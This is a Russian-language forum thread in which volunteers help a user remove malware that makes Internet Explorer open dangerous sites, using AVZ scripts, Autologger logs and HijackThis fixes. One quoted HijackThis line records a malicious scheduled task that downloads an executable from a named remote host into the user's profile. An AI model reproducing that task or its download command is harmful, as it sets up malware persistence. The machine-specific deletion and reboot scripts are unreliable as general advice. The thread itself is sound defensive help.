Перейти к содержанию

Internet Explorer запускается сам по себе и автоматически направляет на опасные веб-адреса


Алексей Корякин

Рекомендуемые сообщения

Алексей Корякин

по поводу интсрукции пункт номер 2 непонимаю как сделать.

  1. Отключите Sandbox (Песочница) / Defense+ (Щелкните правой кнопкой мыши по иконке CIS > Sandbox/Defense+ Security Level > Disable). Это позволит беспрепятственно отключить и удалить CIS и другие защищённые приложения

Иконки COMODO у меня нет... и в удалить/изменить программы там тоже уже нет COMODO.

Ссылка на сообщение
Поделиться на другие сайты
  • Ответов 71
  • Created
  • Последний ответ

Top Posters In This Topic

  • Алексей Корякин

    38

  • regist

    28

  • Sandor

    5

  • thyrex

    1

Алексей Корякин

В DOS-окне ("черный экран" на Вашем скрине) введите 1 и нажмите Enter.

сделал! все прошло в штатном режиме, в конце написано было Completed.

Вообщем сейчас снова сделаю выполнение скриптов AVZ  с отключением антивируса и запуском от админа, а также свежие логи от Автологера. отчеты прикреплю.....

 

P.S на данный момент чего мы добились:  после перезагрузки ПК, автоматически уже не запускается Explorer, это радует, но оповещения от Касперского продолжают поступать 1-2 сообщения о том что заблокирован опасный веб-адрес. периодичность примерно 2 раза за 25-30 минут.

Заново сделал: 

1.  отправил свежий архив на проверку файл: virusinfo_auto_ЛЕША-ПК.zip

Ссылка на результаты анализа:  https://virusinfo.info/virusdetector/report.php?md5=19C663FF799F2D337D67F1529FEB67C7

2. сейчас буду  заново выполнять скрипты в АВЗ. ожидайте...

Закончил по скриптам: -  свежий Файл quarantine.zip из папки AVZ отправлю сейчас  по адресу newvirus@kaspersky.com

 свежий Отчёт о работе по ClearLNK

Осталось заново запустить Автологер, отчеты прикреплю скоро

ClearLNK-06.07.2017_16-04.log

Ссылка на сообщение
Поделиться на другие сайты
Алексей Корякин

Свежий лог Автологера жду.

делается, думаю 1-2 минуты и будет готов, номер KLAN пока не пришел.

Свежий лог Автологера жду.

Готов: 

Жду указаний, стал уже специалистом)))))) пока что включил Касперского пусть поработает....

CollectionLog-2017.07.06-16.17.zip

Изменено пользователем Алексей Корякин
Ссылка на сообщение
Поделиться на другие сайты

1) Ещё раз пройдитесь утилитой для удаления хвостов комода. У вас они до сих пор остались.

 

2)
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО, отключать надо не на 30 минут, а совсем. Назад потом вручную включите, когда закончите процедуры.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт), запускать обязательно от имени Адмистратора:

begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(True);
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\Леша\AppData\Local\yc\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 QuarantineFileF('C:\Users\Леша\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\Леша\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\Леша\AppData\Roaming\curl\');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.

после выполнения скрипта компьютер перезагрузится.
после перезагрузки выполнить второй скрипт:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip из папки AVZ отправьте с помощью этой формы или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения. с указанием пароля: virus в теле письма.

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.
Ссылка на сообщение
Поделиться на другие сайты
Алексей Корякин

Файл quarantine.zip из папки AVZ отправил на этот почтовый ящик: quarantine (собака) safezone.cc


хвосты почистил от комодо заново через Uninstaller Tool

Изменено пользователем Алексей Корякин
Ссылка на сообщение
Поделиться на другие сайты
Алексей Корякин

вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю


звежий анализ от автологера вот


убегаю по делам буду чуть позже. всем спасибо за помощь

post-46503-0-45494400-1499430024_thumb.jpg

CollectionLog-2017.07.07-15.16.zip

Ссылка на сообщение
Поделиться на другие сайты

 

 


вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю
Поставьте драйвера заново.

 

 

 


Файл quarantine.zip из папки AVZ
Вы не его, а неизвестно что отправили. Пришлите что просили.
Ссылка на сообщение
Поделиться на другие сайты
Алексей Корякин

 

вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю

Поставьте драйвера заново.

 

 

 

Файл quarantine.zip из папки AVZ

Вы не его, а неизвестно что отправили. Пришлите что просили.

 

как не его?вот скрин из моих исходящих

 

Regist, я повторно отправил свежий quarantine.zip через сервис http://www.oszone.net/virusnet/

 

вчера ужаснулся перейдя в диспетчер устройств... такого у меня не было.... отказала клавиатура.... аудио.... и так далее это хорошо видно на скрине. сейчас печатаю через виртуальную клавиатуру. скрин прикрепляю

Поставьте драйвера заново.

 

 

 

Файл quarantine.zip из папки AVZ

Вы не его, а неизвестно что отправили. Пришлите что просили.

Regist, я повторно отправил свежий quarantine.zip через сервис http://www.oszone.net/virusnet/

извеняюсь не получается отправить там суммарный объем не должен превышать 8 мб. а у меня он весит только 46 мб. сейчас тогда снова отправлю просто на почту quarantine@safezone.cc.

все, только что отправил quarantine.zip из папки AVZ на quarantine@safezone.cc.

вот скрин :

post-46503-0-49458100-1499437824_thumb.jpg

post-46503-0-92379900-1499439441_thumb.jpg

Ссылка на сообщение
Поделиться на другие сайты

как не его?вот скрин из моих исходящих

Не знаю, что у вас на скрине, но вы прислали файл "narod_attachment_links.html" весом в 1 Kb.

 

 

извеняюсь не получается отправить там суммарный объем не должен превышать 8 мб. а у меня он весит только 46 мб.

Выложите тогда на обменник или в облако и ссылку мне в ЛС. Изменено пользователем regist
Ссылка на сообщение
Поделиться на другие сайты
Алексей Корякин

 

как не его?вот скрин из моих исходящих

Не знаю, что у вас на скрине, но вы прислали файл "narod_attachment_links.html" весом в 1 Kb.

 

 

извеняюсь не получается отправить там суммарный объем не должен превышать 8 мб. а у меня он весит только 46 мб.

Выложите тогда на обменник или в облако и ссылку мне в ЛС.

 

отправил в лс ссылку

Ссылка на сообщение
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O2 - BHO: (no name) - {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} - (no file)
O4 - MSConfig\startupfolder: C:^Users^Леша^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^FlylinkDC++.lnk - C:\Program Files\FlylinkDC++\FlylinkDC.exe (2013/08/02) (file missing)
O4 - MSConfig\startupfolder: C:^Users^Леша^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Punto Switcher.lnk - C:\Program Files\Yandex\Punto Switcher\punto.exe (2015/10/25) (file missing)
O4 - MSConfig\startupreg: [SunJavaUpdateSched] C:\Program Files\Common Files\Java\Java Update\jusched.exe  (file missing) (HKLM) (2013/08/02)
O4 - MSConfig\startupreg: [VKSaver] C:\ProgramData\VKSaver\VKSaver.exe  (file missing) (HKLM) (2013/08/02)
O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Extra context menu item: Закачать при помощи Download Master - (no file)
O8 - Extra context menu item: Передать на удаленную закачку DM - (no file)
O9 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O22 - Task (Ready): MSI - C:\Users\Леша\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="Program Files\videomaster_5_0_repack_by_kaktustv_exe_tfile_ru_torrent___.exe" (file missing)
O22 - Task (Ready): VKSaverUpdate - C:\ProgramData\VKSaver\VKSaver.exe -autoupdate (file missing)
O22 - Task (Ready): curl - C:\Users\Леша\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Леша\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\Леша\AppData\Roaming\curl\curl.exe (file missing)

 

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
 

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.


×
×
  • Создать...